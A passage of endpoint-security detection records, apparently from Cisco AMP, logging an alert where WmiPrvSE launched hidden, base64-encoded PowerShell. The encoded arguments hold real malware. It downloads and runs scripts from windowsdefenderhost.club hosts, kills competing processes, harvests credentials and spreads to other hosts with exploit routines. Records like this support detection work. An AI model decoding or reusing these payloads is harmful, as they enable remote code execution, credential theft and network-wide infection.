GUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHM